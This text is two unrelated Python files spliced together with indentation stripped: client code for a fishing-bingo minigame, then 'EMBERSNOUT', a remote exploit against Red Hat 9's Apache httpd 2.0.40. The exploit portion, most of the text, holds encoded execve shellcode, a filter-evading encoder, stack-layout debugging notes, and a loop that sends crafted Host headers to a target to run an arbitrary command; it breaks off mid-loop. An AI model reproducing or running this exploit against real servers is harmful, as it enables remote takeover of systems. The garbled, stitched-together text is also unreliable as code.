if game is not None:
game.setGameState(gameState)
self.card.cellUpdate(cellId)
return
def __generateCard(self):
self.notify.debug('__generateCard: %s' % self.typeId)
if self.card.getGame():
self.card.removeGame()
game = self.__cardChoice()
game.setGameState(self.initGameState)
self.card.addGame(game)
self.card.generateCard(self.tileSeed, self.pond.getArea())
color = BingoGlobals.getColor(self.typeId)
self.card.setProp('image_color', VBase4(color[0], color[1], color[2], color[3]))
color = BingoGlobals.getButtonColor(self.typeId)
self.card.bingo.setProp('image_color', VBase4(color[0], color[1], color[2], color[3]))
if self.hasEntered:
self.card.loadCard()
self.card.show()
else:
self.card.hide()
def showCard(self):
if self.state != 'Off' and self.card.getGame() != None:
self.card.loadCard()
self.card.show()
elif self.state == 'GameOver':
self.card.show()
elif self.state == 'Reward':
self.card.show()
elif self.state == 'WaitCountdown':
self.card.show()
self.card.showNextGameTimer(TTLocalizer.FishBingoNextGame)
elif self.state == 'Intermission':
self.card.showNextGameTimer(TTLocalizer.FishBingoIntermission)
self.card.show()
self.hasEntered = 1
return
def __cardChoice(self):
return self.cardTypeDict.get(self.typeId)()
def checkForBingo(self):
success = self.card.checkForBingo()
if success:
self.d_bingoCall()
self.request('Reward')
def enableBingo(self):
self.card.setBingo(DGG.NORMAL, self.checkForBingo)
def setPondDoId(self, pondId):
self.pondDoId = pondId
if pondId in self.cr.doId2do:
self.setPond(self.cr.doId2do[pondId])
else:
self.acceptOnce('generate-%d' % pondId, self.setPond)
def setPond(self, pond):
self.pond = pond
self.pond.setPondBingoManager(self)
def setState(self, state, timeStamp):
self.notify.debug('State change: %s -> %s' % (self.state, state))
self.request(state, timeStamp)
def setLastCatch(self, catch):
self.lastCatch = catch
self.card.fishCaught(catch)
def castingStarted(self):
if self.card:
self.card.castingStarted()
def setSpot(self, spot):
self.spot = spot
def setJackpot(self, jackpot):
self.jackpot = jackpot
def enterOff(self, args = None):
self.notify.debug('enterOff: Enter Off State')
del self.spot
self.spot = None
if self.card.getGame:
self.card.removeGame()
self.card.hide()
self.card.stopNextGameTimer()
self.hasEntered = 0
self.lastCatch = None
return
def filterOff(self, request, args):
if request == 'Intro':
return 'Intro'
if request == 'WaitCountdown':
return (request, args)
if request == 'Playing':
self.__generateCard()
self.card.setJackpotText(str(self.jackpot))
return (request, args)
if request == 'Intermission':
return (request, args)
if request == 'GameOver':
return (request, args)
if request == 'Reward':
return ('GameOver', args)
self.notify.debug('filterOff: Invalid State Transition from, Off to %s' % request)
def exitOff(self):
self.notify.debug('exitOff: Exit Off State')
def enterIntro(self, args = None):
self.notify.debug('enterIntro: Enter Intro State')
self.pond.setSpotGui()
self.hasEntered = 1
def filterIntro(self, request, args):
if request == 'WaitCountdown':
return (request, args)
self.notify.debug('filterIntro: Invalid State Transition from Intro to %s' % request)
def exitIntro(self):
self.notify.debug('exitIntro: Exit Intro State')
def enterWaitCountdown(self, timeStamp):
self.notify.debug('enterWaitCountdown: Enter WaitCountdown State')
time = BingoGlobals.TIMEOUT_SESSION - globalClockDelta.localElapsedTime(timeStamp[0])
self.card.startNextGameCountdown(time)
if self.hasEntered:
self.card.showNextGameTimer(TTLocalizer.FishBingoNextGame)
def filterWaitCountdown(self, request, args):
if request == 'Playing':
return (request, args)
self.notify.debug('filterOff: Invalid State Transition from WaitCountdown to %s' % request)
def exitWaitCountdown(self):
self.notify.debug('exitWaitCountdown: Exit WaitCountdown State')
if self.pond:
self.__generateCard()
self.card.setJackpotText(str(self.jackpot))
self.card.resetGameTimer()
self.card.hideNextGameTimer()
def enterPlaying(self, timeStamp):
self.notify.debug('enterPlaying: Enter Playing State')
self.lastCatch = None
session = BingoGlobals.getGameTime(self.typeId)
time = session - globalClockDelta.localElapsedTime(timeStamp[0])
self.card.startGameCountdown(time)
self.card.enableCard(self.checkForUpdate)
return
def filterPlaying(self, request, args):
if request == 'Reward':
return (request, args)
if request == 'GameOver':
return (request, args)
self.notify.debug('filterOff: Invalid State Transition from Playing to %s' % request)
def exitPlaying(self):
self.notify.debug('exitPlaying: Exit Playing State')
self.card.resetGameTimer()
def enterReward(self, timeStamp):
self.notify.debug('enterReward: Enter Reward State')
if self.card:
self.card.setBingo()
self.card.removeGame()
self.card.setGameOver(TTLocalizer.FishBingoVictory)
localToonSpot = self.pond.getLocalToonSpot()
if localToonSpot:
localToonSpot.setJarAmount(self.jackpot)
self.jackpot = 0
def filterReward(self, request, args):
if request == 'WaitCountdown':
return (request, args)
if request == 'Intermission':
return (request, args)
if request == 'Off':
return 'Off'
self.notify.debug('filterOff: Invalid State Transition from Reward to %s' % request)
def exitReward(self):
self.notify.debug('exitReward: Exit Reward State')
self.card.setGameOver('')
def enterGameOver(self, timeStamp):
self.notify.debug('enterGameOver: Enter GameOver State')
self.card.setBingo()
self.card.removeGame()
self.card.setGameOver(TTLocalizer.FishBingoGameOver)
def filterGameOver(self, request, args):
if request == 'WaitCountdown':
return (request, args)
if request == 'Intermission':
return (request, args)
if request == 'Off':
return 'Off'
self.notify.debug('filterOff: Invalid State Transition from GameOver to %s' % request)
def exitGameOver(self):
self.notify.debug('exitGameOver: Exit GameOver State')
self.card.setGameOver('')
self.card.resetGameTypeText()
def enterIntermission(self, timeStamp):
self.notify.debug('enterIntermission: Enter Intermission State')
if self.hasEntered:
self.card.showNextGameTimer(TTLocalizer.FishBingoIntermission)
self.notify.debug('enterIntermission: timestamp %s' % timeStamp[0])
elapsedTime = globalClockDelta.localElapsedTime(timeStamp[0])
self.notify.debug('enterIntermission: elapsedTime %s' % elapsedTime)
waitTime = BingoGlobals.HOUR_BREAK_SESSION - elapsedTime
self.notify.debug('enterIntermission: waitTime %s' % waitTime)
self.card.startNextGameCountdown(waitTime)
def filterIntermission(self, request, args):
if request == 'WaitCountdown':
return (request, args)
if request == 'Off':
return 'Off'
self.notify.warning('filterOff: Invalid State Transition from GameOver to %s' % request)
def exitIntermission(self):
self.notify.debug('enterIntermission: Exit Intermission State')
| |
#!/usr/bin/env python
# EMBERSNOUT...a remote exploit against Red Hat 9.0's httpd-2.0.40-21
# via TCP port 443 (https)
import exceptions
import httplib
import random
import socket
import string
import sys
import time
# Generic exception class, to get us out of the topmost loop, if needed...
class WhackLoopException(exceptions.Exception):
def __init__(self, args=None):
self.args = args
target_server_version_check = 'Server: Apache/2.0.40 (Red Hat Linux)';
not_vulnerable_strings = {}
# This one occurs when the 'UseCanonicalName On' directive is
# specified, turning off inclusion of our injected hostname
# during construction of the redirection string...8^(...
not_vulnerable_strings['UseCanonicalName On'] = \
('400 Bad', \
'Your browser', \
'sent a request that', \
'this server could not understand.', \
'<address>', \
'Apache/2.0.40', \
'</address>', \
'</body>', \
'</html>')
# This one occurs when the 'Options IncludesNoExec' directive is
# missing from the...
# <IfModule mod_include.c>
# <Directory "/var/www/error">
# </IfModule>
# ...specification set...
not_vulnerable_strings['Options IncludesNoExec'] = \
('<!--#set var="TITLE" value="Bad request!" -->', \
'<!--#include virtual="include/top.html" -->', \
'Your browser (or proxy) sent a request that', \
'this server could not understand.', \
'<!--#include virtual="include/bottom.html" -->')
# Initial (pre-encoded) shellcode...
plain_cmdshellcode_front = \
'\xeb\x22' + \
'\x59' + \
'\x31\xc0' + \
'\x50' + \
'\x68''//sh' + \
'\x68''/bin' + \
'\x89\xe3' + \
'\x50' + \
'\x66\x68''-c' + \
'\x89\xe7' + \
'\x50' + \
'\x51' + \
'\x57' + \
'\x53' + \
'\x89\xe1' + \
'\x99' + \
'\xb0\x0b' + \
'\xcd\x80' + \
'\xe8\xd9\xff\xff\xff'
# Some bytes of NULL to terminate the argument list...
plain_cmdshellcode_back = \
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
# shellcode thawer...
decoder_wench = \
'\x74\x3f\x75\x3d\x8a\x1e\x80\xeb\x61\x30\xd8\x81\xc6\x02\x01\x01' + \
'\x01\x81\xee\x01\x01\x01\x01\xc3\x8b\x34\x24\x89\xf7\x31\xc0\xe8' + \
'\xe0\xff\xff\xff\x80\xfb\x19\x74\x1d\xc1\xe0\x04\xe8\xd3\xff\xff' + \
'\xff\x88\x07\x81\xc7\x02\x01\x01\x01\x81\xef\x01\x01\x01\x01\xeb' + \
'\xdc\xe8\xd2\xff\xff\xff'
# Jump us forward from start of buffer to buffer+0x30 (shellcode)...
# originally...
jump_me_baby = '\xeb\x2e\x90\x90'
jump_me_baby_length = len(jump_me_baby);
thorough_stack_offset_list = [ -0x201c, -0x200c, -0x1fec, -0x1fe8, -0x1fac, -0x1c, 0x0, 0x68, 0x98, 0xa4, 0x118, 0x124, 0x134, 0x144, 0x154, 0x164, 0x170, 0x184 ]
quick_stack_offset_list = [ 0x0 ]
attempted_whack_pool_pointers = {}
# ============================================================================
# ============= Function definitions...
# ============================================================================
def bad_address_byte(byte_to_check):
if (byte_to_check.isupper() or (byte_to_check == chr(0x0)) or (byte_to_check == chr(0xa)) or (byte_to_check == chr(0xd))):
return(1)
else:
return(0)
def bad_data_byte(byte_to_check):
if ((byte_to_check == chr(0x0)) or (byte_to_check == chr(0xa)) or (byte_to_check == chr(0xd)) or \
((byte_to_check >= chr(0x1)) and (byte_to_check <= chr(0x30))) or \
((byte_to_check >= chr(0x3c)) and (byte_to_check <= chr(0x40))) or \
((byte_to_check >= chr(0x5b)) and (byte_to_check <= chr(0x60))) or \
((byte_to_check >= chr(0x7b)) and (byte_to_check <= chr(0x7e)))):
return(1)
else:
return(0)
def bogus_ass_address_bytes(address_to_check):
input_bytes = (chr((address_to_check >> 24) & 0xff), \
chr((address_to_check >> 16) & 0xff), \
chr((address_to_check >> 8) & 0xff), \
chr(address_to_check & 0xff))
bogus_ass_bytes = []
# Default to success...
return_value = 0
for byte_to_check in input_bytes:
if (bad_address_byte(byte_to_check)):
bogus_ass_bytes += byte_to_check
return_value += 1
return(return_value, bogus_ass_bytes)
def encoder_wench(input_string):
# Work (in C) to arrive at this encoding/decoding scheme attributed
encoded_string = []
input_string_length = len(input_string)
for i in range(0, input_string_length):
# Combining the leading/trailing nibbles with 'a'
# to form each successive byte of the encoded
# string...definitely NOT rocket science, but
# it gets us through the filter...which is cool...
next_byte = ord(input_string[i])
encoded_string += chr(0x61 + ((next_byte >> 4) & 0xf))
encoded_string += chr(0x61 + (next_byte & 0xf))
# 'z' as the terminator...
encoded_string += chr(0x7a)
return(encoded_string)
def usage(command_name):
print '\n'
print 'Usage -> %s ip port packet_size start_ebp end_ebp ebp_inc hex_pad_byte "cmd"\n' % (command_name)
print 'where...\n'
print '\tip............target IP address'
print '\tport..........target httpd TCP port number (usually 443)'
print '\tpacket_size...attack packet length in bytes'
print '\tstart_ebp.....guessed %ebp value to start with'
print '\tend_ebp.......guessed %ebp value to end with'
print '\tebp_inc.......how many stack bytes to bump %ebp each time'
print '\thex_pad_byte..packet filling byte (0x0 will do randomized fill)'
print '\t"cmd".........ASCII command string to be executed on target'
print '\n'
return
# ============================================================================
# ============= Executable code...
# ============================================================================
print "Arguments: ", sys.argv
# ============================================================================
# ============= Argument fetching...
# ============================================================================
if (len(sys.argv) != 9):
# BONK!!!
usage(sys.argv[0])
sys.exit(0)
server_address = sys.argv[1]
port = int(sys.argv[2], 10)
packet_size = long(sys.argv[3], 10)
whack_frame_pointer = start_address = long(sys.argv[4], 16)
# In case we need this functionality...
random_generator = random.Random(whack_frame_pointer)
# ============================================================================
# NOTE: We find the address of the start of our (filtered) buffer to be at
# offset 0x14 from the start of apr_pstrcat()'s frame pointer. We're
# going to use this address as the "apr_memnode_t *active" from the
# bogus "apr_pool_t" structure pointed to by whack_pool_pointer.
# "apr_memnode_t *active" is at offset 0x28 from the start of the
# "apr_pool_t" structure, so to succeed, whack_pool_pointer needs to
# be 0x14 less than the frame pointer of apr_pstrcat(), so that
# whack_pool_pointer + 0x28 gets us our buffer's start address loaded
# as "pool->active"...8^)
# Stack frame at 0xbfffe288:
# eip = 0x402fa19c in apr_pstrcat; saved eip 0x8077ef7
# called by frame at 0xbfffe2f8, caller of frame at 0xbfffe228
# Arglist at 0xbfffe288, args:
# Locals at 0xbfffe288, Previous frame's sp in esp
# Saved registers:
# ebp at 0xbfffe288, edi at 0xbfffe284, eip at 0xbfffe28c
# (gdb) x/32xw 0xbfffe288
# 0xbfffe288: 0xbfffe2f8 0x08077ef7 0xbfffe274 0x08085dbb
# 0xbfffe298: 0x0808c9a0 ** 0x081f6038 ** 0x0808bf82 0xbfffe2c0
# 0xbfffe2a8: 0x0808bf72 0x00000000 0x081d1790 0x081f7e38
# 0xbfffe2b8: 0x00000000 0x48000010 0x00333434 0x081f7e38
# 0xbfffe2c8: 0xbfffe2f8 0x081e9e28 0x50415448 0x081f5da8
# 0xbfffe2d8: 0xbfffe2f8 0x402fc718 0x081f5da8 0x08161ae5
# 0xbfffe2e8: 0x0000002d 0x081e9e28 0x0000000c 0x081f5da8
# ...so, to hit on this target, for example...
# 0xbfffe298 --> contains desired load address for "pool->active"
# - 0x14
# ==========
# 0xbfffe288 --> stack frame for apr_pstrcat()
# - 0x14
# ==========
# 0xbfffe274 --> setting we'll need for whack_pool_pointer
# ============================================================================
end_address = long(sys.argv[5], 16)
address_increment = int(sys.argv[6], 16)
hex_pad_byte = int(sys.argv[7], 16)
plain_command_to_execute = sys.argv[8]
# ============================================================================
# ============= Shellcode prep/encode...
# ============================================================================
plain_cmdshellcode = \
plain_cmdshellcode_front + \
plain_command_to_execute + \
plain_cmdshellcode_back;
plain_cmdshellcode_length = len(plain_cmdshellcode);
# Yo!!! Encoder wench!!!
encoded_shellcode = encoder_wench(plain_cmdshellcode)
encoded_shellcode_length = len(encoded_shellcode);
# Final shellcode = the decoder wench + our encoded shellcode...
final_encoded_shellcode = decoder_wench
for i in range(0, encoded_shellcode_length):
final_encoded_shellcode += encoded_shellcode[i]
final_encoded_shellcode_length = len(final_encoded_shellcode);
# Time info
start_time = time.asctime(time.gmtime())
print "== %s ==============================================================" % (start_time)
print 'parameter server_address.....................: %s' % (server_address)
print 'parameter port...............................: 0x%x (%d)' % (port, port)
print 'parameter packet_size........................: 0x%x (%d)' % (packet_size, packet_size)
print 'parameter start_address......................: 0x%x' % (start_address)
print 'parameter end_address........................: 0x%x' % (end_address)
print 'parameter address_increment..................: 0x%x (%d)' % (address_increment, address_increment)
print 'parameter hex_pad_byte.......................:',
if (hex_pad_byte == 0x0):
# Randomize...
print 'Somewhat RANDOM Bytes'
else:
print '0x%x' % (hex_pad_byte)
print 'parameter plain_command_to_execute...........: <%s>' % (plain_command_to_execute)
# Now...we want to point "pool->active->first_avail" at the start of the
# stack pointer for memcpy(), so that we can whack memcpy()'s return
# address directly...if we don't, we'll crash in a bit in either
# memcpy() or strlen(), since apr_pstrcat() cruises through its
# variable argument list a second time, and we can't get a NULL word
# into the overwritten buffer, due to filtration...8^(
#
# We find the stack at the point of memcpy() (who is, apparently, frameless,
# and uses %esp for return purposes, not %ebp) to look like...
# Dump of assembler code for function memcpy:
# 0x4207bfd0 <memcpy+0>: mov 0xc(%esp,1),%ecx
# 0x4207bfd4 <memcpy+4>: mov %edi,%eax
# 0x4207bfd6 <memcpy+6>: mov 0x4(%esp,1),%edi
# 0x4207bfda <memcpy+10>: mov %esi,%edx
# 0x4207bfdc <memcpy+12>: mov 0x8(%esp,1),%esi
# 0x4207bfe0 <memcpy+16>: cld
# 0x4207bfe1 <memcpy+17>: shr %ecx
# 0x4207bfe3 <memcpy+19>: jae 0x4207bfe6 <memcpy+22>
# 0x4207bfe5 <memcpy+21>: movsb %ds:(%esi),%es:(%edi)
# 0x4207bfe6 <memcpy+22>: shr %ecx
# 0x4207bfe8 <memcpy+24>: jae 0x4207bfec <memcpy+28>
# 0x4207bfea <memcpy+26>: movsw %ds:(%esi),%es:(%edi)
# 0x4207bfec <memcpy+28>: repz movsl %ds:(%esi),%es:(%edi)
# 0x4207bfee <memcpy+30>: mov %eax,%edi
# 0x4207bff0 <memcpy+32>: mov %edx,%esi
# 0x4207bff2 <memcpy+34>: mov 0x4(%esp,1),%eax
# 0x4207bff6 <memcpy+38>: ret
# End of assembler dump.
# 0 0x4207bfea in memcpy () at memcpy:-1
# 1 0x402fa1e6 in apr_pstrcat () from /usr/lib/libapr.so.0
# 0xbfffe22c: *** 0x402fa1e6 *** 0xbffff625 0xbfffffff 0x0000000b
# 0xbfffe23c: 0x00001390 0xbfffe2ac 0x0000000b 0x00000006
# 0xbfffe24c: 0xbfffe273 0x00000000 0x00000021 0x00001388
# 0xbfffe25c: 0x00000006 0x00000003 0x0000000b 0xbfffe288
# 0xbfffe26c: 0x0806e3b5 0x3c1d1790 0x72646461 0x3e737365
# 0xbfffe27c: 0x63617041 0x322f6568 0x342e302e 0x65532030
whack_memcpy_return_address_frame_pointer_decrement = 0x5c
# Let's divide our packet_size by 2, and also decrement back that far, to...
# 1...hopefully avoid falling off the end of the stack (some frame pointers can
# be notably cheap/cheesy in their allocations, we've found...and
# 2...get our whack values and shellcode into the middle of the buffer...
whack_prevent_from_falling_off_stack_decrement = packet_size / 2
whack_prevent_from_falling_off_stack_decrement = packet_size - 0x100
# ... 0xbfffe288: 0x90909090...1st argument: apr_pool_t *a
# ... 0xbfffe288: 0x08085dbb...2nd argument: <_IO_stdin_used+2135>: ""
# ... 0xbfffe298: 0x0808c9a0...3rd argument: <ap_bucket_type_error+4256>: "<address>Apache/2.0.40 Server at "
# ... 0xbfffe298: 0x081f6038...4th argument: '\220' <repeats 200 times>...
# ... 0xbfffe298: 0x0808bf82...5th argument: <ap_bucket_type_error+1666>: " Port "
# ... 0xbfffe298: 0xbfffe2c0...6th argument: "443"
# ... 0xbfffe2a8: 0x0808bf72...7th argument; <ap_bucket_type_error+1650>: "</address>\n"
# ... 0xbfffe2a8: 0x00000000...NULL...end of variable argument list
whack_active_first_avail_decrement = \
len('<address>Apache/2.0.40 Server at ') + \
len(' Port ') + \
len('443') + \
len('</address>\n') + \
whack_prevent_from_falling_off_stack_decrement + \
0x10
# What the heck, we have the room...
whack_pool_pointer = long(whack_frame_pointer - 0x14)
whack_active_first_avail_pointer = whack_frame_pointer - whack_memcpy_return_address_frame_pointer_decrement
print "=========================================================================================="
print 'computed whack_pool_pointer.................: 0x%x' % (whack_pool_pointer)
print 'original whack_active_first_avail_pointer...: 0x%x' % (whack_active_first_avail_pointer)
whack_active_first_avail_pointer -= whack_active_first_avail_decrement
whack_active_endp_pointer = 0xbffffff0
# Program received signal SIGSEGV, Segmentation fault.
# 0xdeadbeef in ?? ()
# (gdb) ir
# eax:<0xb3b3b3b3> ecx:<0x00000000> edx:<0xbfffe208> ebx:<0x4030d508>
# esp:<0xbfffe230> ebp:<0xbfffe288> esi:<0xbfffe208> edi:<0x081f6038>
# eip:<0xdeadbeef> efl:<0x00010216> cs:<0x00000023> ss:<0x0000002b>
# ds:<0x0000002b> es:<0x0000002b> fs:<0x00000000> gs:<0x00000033>
# jump_vector_address = 0xdeadbeef
# Cool...8^)
#
# Hey...how about.....0x8051d9f <data.0+134552431>: call *%edi
# jump_vector_address -> 0x8051d9f...the original
jump_vector_address = '\x9f\x1d\x05\x08'
# Program received signal SIGSEGV, Segmentation fault.
# 0x081f6038 in ?? ()
# (gdb) x/128xw 0x081f6038
# 0x81f6038: 0xa2a2a2a2 0xa3a3a3a3 0xa4a4a4a4 0xa5a5a5a5
# 0x81f6048: 0xbffff5a7 0xbffffff0 0xa1a1a1a1 0xa1a1a1a1
# 0x81f6058: 0xb3b3b3b3 0x08051d9f 0xb3b3b3b3 0xb3b3b3b3
# 0x81f6068: 0xb4b4b4b4 0xb4b4b4b4 0xb4b4b4b4 0xb4b4b4b4
# 0x81f6078: 0xb5b5b5b5 0xb5b5b5b5 0xb5b5b5b5 0xb5b5b5b5
# So...if we make that first word a jump $+0x30, for example, we win, starting at
# --> 0x81f6068: 0xb4b4b4b4 0xb4b4b4b4 0xb4b4b4b4 0xb4b4b4b4
print 'computed whack_active_first_avail_pointer...: 0x%x' % (whack_active_first_avail_pointer)
print 'computed whack_active_endp_pointer..........: 0x%x' % (whack_active_endp_pointer)
print 'computed final_encoded_shellcode_length.....: 0x%x (%d)' % (final_encoded_shellcode_length, final_encoded_shellcode_length)
print "=========================================================================================="
we_still_think_target_is_vulnerable = 0
whack_count = whack_ungrokkable_count = keyboard_interrupt_count = probable_crash_count = total_bytes_thrown = total_bytes_received = long(0)
not_time_to_quit = 1
try:
while (not_time_to_quit and (whack_frame_pointer <= end_address)):
whack_time = time.asctime(time.gmtime())
print "0x%x == %s ============================================================" % (whack_frame_pointer,whack_time)
(bogus_ass_active_first_avail_byte_count, bogus_ass_active_first_avail_bytes) = bogus_ass_address_bytes(whack_active_first_avail_pointer)
# Now comes the hard part...we need to take our current parameters, and generate
# either 1 or 18 (yes, I said 18) iterations, depending on whether or not we
# can pass the computed whack_active_first_avail_pointer through unfiltered
# (the "quick" mode), or need to generate the other 18 potential addresses
# to try and whack 1 of the 18 copies of the "apr_pool_t *" pointer that can
# be found on the stack (the "thorough" mode)...
#
# Stack 'em up...
pool_pointer_address_stack = []
stack_offset_list = []
if (bogus_ass_active_first_avail_byte_count):
# Aw, poop...Can't do a single throw...need the "thorough" mode...
print '0x%x ---> THOROUGH attack due to %d ungrokkable whack_active_first_avail_pointer address (0x%x) byte(s):' % (whack_frame_pointer, bogus_ass_active_first_avail_byte_count, whack_active_first_avail_pointer), bogus_ass_active_first_avail_bytes
stack_offset_list = thorough_stack_offset_list
else:
stack_offset_list = quick_stack_offset_list
for stack_offset in stack_offset_list:
# Sorry...offsets mistakenly computed based on the pool->active pointer...I know, I know,
# I should have done it from the computed pool pointer in each case, but you know,
# you only have so much time to use a graphical calculator in life, and if you
# want to rebalance each offset by the additional 0x28, and then use the
# whack_pool_pointer, please feel free...but adding in the 0x28 here gets
# us the correct value, go figure...
try_pool_pointer = whack_pool_pointer + long(stack_offset)
if (attempted_whack_pool_pointers.has_key(try_pool_pointer)):
# Yep...tried this one already...skip around, but keep a count...
attempted_whack_pool_pointers[try_pool_pointer] += 1
else:
# Nope...haven't seen this one yet...
attempted_whack_pool_pointers[try_pool_pointer] = 1
pool_pointer_address_stack.append(try_pool_pointer)
# Before we start popping 'em off...reverse 'em, since we went least to greatest
# while adding...that way, we'll also be least to greatest while popping off...8^)
pool_pointer_address_stack.reverse()
pool_pointer_count = len(pool_pointer_address_stack)
while (not_time_to_quit and len(pool_pointer_address_stack)):
# Pop 'em off...one at a time...
whack_pool_pointer = pool_pointer_address_stack.pop()
print "0x%x (%02d of %02d) =============================================================================" % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
(bogus_ass_pool_byte_count, bogus_ass_pool_bytes) = bogus_ass_address_bytes(whack_pool_pointer)
if (bogus_ass_pool_byte_count):
# Aw, poop...Bump the whack ungrokkable count...
print '0x%x (%02d of %02d) ---> SKIPPING due to %d ungrokkable whack_pool_pointer address (0x%x) byte(s):' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, bogus_ass_pool_byte_count, whack_pool_pointer), bogus_ass_pool_bytes
whack_ungrokkable_count += 1
else:
# FIRE IN THE HOLE!!!
print '0x%x (%02d of %02d) ---> Throwing whack_pool_pointer: 0x%x' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, whack_pool_pointer)
# TCP socket, please...
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Remote side tuple...
target_address = (server_address, port)
print '0x%x (%02d of %02d) ---> Connecting to %s via TCP port %d...' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, server_address, port)
s.connect(target_address)
if (port == 80):
# sb whack...
msg = 'GET /manual HTTP/1.1'
elif (port == 443):
msg = 'GET /index.html HTTP/1.0'
else:
msg = 'GET /index.html HTTP/1.0'
print "0x%x (%02d of %02d) ---> Sending: <%s>" % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, msg)
msg += '\n'
s.send(msg)
total_bytes_thrown += len(msg)
host_field = 'Host: '
for i in range(0, packet_size):
if ((i >= 0x0) and (i <= 0x3)):
# Okay...first 0x30 bytes of our buffer are the
# bogus "apr_pool_t" structure, which we hop to
# via stack...
# 0x10...first_avail
# 0x14...endp
#
# We need to jump ahead just a bit, to jump over our critical values
# used at offsets 0x10, 0x14 and 0x24, to shellcode, which we're
# gonna place at offset 0x30...
host_field += jump_me_baby[i]
elif ((i >= 0x4) and (i <= 0x7)):
# Less of a jump, by 4 bytes...
#
# We need to jump ahead just a bit, to jump over our critical values
# used at offsets 0x10, 0x14 and 0x24, to shellcode, which we're
# gonna place at offset 0x30...
host_field += jump_me_baby[i - 0x4]
elif (((i >= 0x10) and (i <= 0x13)) or ((i >= 0x610) and (i <= 0x613))):
# char *pool->active->first_avail
if (i % 4 == 0):
host_field += chr(whack_active_first_avail_pointer & 0xff)
elif (i % 4 == 1):
host_field += chr((whack_active_first_avail_pointer >> 8) & 0xff)
elif (i % 4 == 2):
host_field += chr((whack_active_first_avail_pointer >> 16) & 0xff)
else:
host_field += chr((whack_active_first_avail_pointer >> 24) & 0xff)
elif (((i >= 0x14) and (i <= 0x17)) or ((i >= 0x614) and (i <= 0x617))):
# char *pool->active->endp
if (i % 4 == 0):
host_field += chr(whack_active_endp_pointer & 0xff)
elif (i % 4 == 1):
host_field += chr((whack_active_endp_pointer >> 8) & 0xff)
elif (i % 4 == 2):
host_field += chr((whack_active_endp_pointer >> 16) & 0xff)
else:
host_field += chr((whack_active_endp_pointer >> 24) & 0xff)
elif ((i >= 0x30) and (i < (0x30 + final_encoded_shellcode_length))):
# We want shellcode hereabouts...8^)
# Mom...we're home!!!
host_field += final_encoded_shellcode[i - 0x30]
elif (((i >= 0x600) and (i <= 0x603)) or ((i >= 0x620) and (i <= 0x623))):
# The target offset...otherwise known as our bogus pool pointer...8^)
if (i % 4 == 0):
host_field += chr(whack_pool_pointer & 0xff)
elif (i % 4 == 1):
host_field += chr((whack_pool_pointer >> 8) & 0xff)
elif (i % 4 == 2):
host_field += chr((whack_pool_pointer >> 16) & 0xff)
else:
host_field += chr((whack_pool_pointer >> 24) & 0xff)
# elif ((i >= 0x7d0) and (i <= 0x1387)):
# elif ((i >= 0x1200) and (i <= 0x1300)):
# elif ((i >= 0x1000) and (i <= packet_size)):
elif ((i >= 0x604) and (i <= packet_size)):
# Ass end of the packet...non-scientifically adding 0x100/4 of 'em...
#
# Load a bunch of copies of our jump vector, in case we get any
# address byte translation...We can get more precise with additional
# testing at some later point...8^)
if (i % 4 == 0):
host_field += jump_vector_address[0]
elif (i % 4 == 1):
host_field += jump_vector_address[1]
elif (i % 4 == 2):
host_field += jump_vector_address[2]
else:
host_field += jump_vector_address[3]
else:
if (hex_pad_byte == 0x0):
# Randomizing...
random_pad_byte = chr(random.randint(0x1, 0xff) & 0xff)
while (bad_data_byte(random_pad_byte)):
random_pad_byte = chr(random.randint(0x1, 0xff) & 0xff)
host_field += random_pad_byte
else:
host_field += chr(hex_pad_byte)
host_field += '\n'
print '0x%x (%02d of %02d) ---> Sending: <Host> field...%d bytes' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, len(host_field))
s.send(host_field)
total_bytes_thrown += len(host_field)
if (port == 80):
# sb whack...2 of 3...
print '0x%x (%02d of %02d) ---> Sending: <Host> field...%d bytes' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, len(host_field))
s.send(host_field)
total_bytes_thrown += len(host_field)
# sb whack...3 of 3...don't forget the bogus port number!!!
bogus_port = '64432'
last_host_field = host_field[:len(host_field)]
last_host_field += ':'
last_host_field += bogus_port
last_host_field += '\n'
host_field = last_host_field
print '0x%x (%02d of %02d) ---> Sending: <Host> field...%d bytes' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, len(host_field))
s.send(host_field)
total_bytes_thrown += len(host_field)
double_newline = '\n\n'
print '0x%x (%02d of %02d) ---> Sending: <double newline>' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
s.send(double_newline)
total_bytes_thrown += len(double_newline)
try:
target_response = s.recv(8192)
if (len(target_response) == 0):
# Cool...looks like we whacked him, methinks...
print '0x%x (%02d of %02d) <--- Received: EOF on connection...no response came back!' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
if (we_still_think_target_is_vulnerable == 0):
# Guess again, grasshopper...
we_still_think_target_is_vulnerable = 1
probable_crash_count += 1
else:
total_bytes_received += len(target_response)
print '0x%x <--- Received: %d bytes of response\n%s' % (whack_frame_pointer, len(target_response), target_response)
if (we_still_think_target_is_vulnerable == 0):
# Otay...vulnerability assessment, please...
#
# "I agree...Preparation H DOES feel good...on the whole..."
found_all_error_strings = {}
for key in not_vulnerable_strings.keys():
found_all_error_strings[key] = 1
for next_string in not_vulnerable_strings[key]:
if (target_response.find(next_string) == -1):
# Not found...okay, he COULD still be vulnerable...
found_all_error_strings[key] = 0
if (found_all_error_strings[key]):
# Uh-oh...he may NOT be vulnerable, 'cause he's matched
# one of our little detector string sets...
print '0x%x (%02d of %02d) **** Target appears NON-VULNERABLE!!!' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count)
print '0x%x (%02d of %02d) **** Target may have --> %s <-- directive set...which would suck!!!' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count, key)
print '0x%x (%02d of %02d) Would you like to continue (y/n)? [Y] ' % (whack_frame_pointer, pool_pointer_count - len(pool_pointer_address_stack), pool_pointer_count),
response = string.lower(raw_input())
if (response == ''):
response = 'y'
while ((response != 'y') and (response != 'n')):
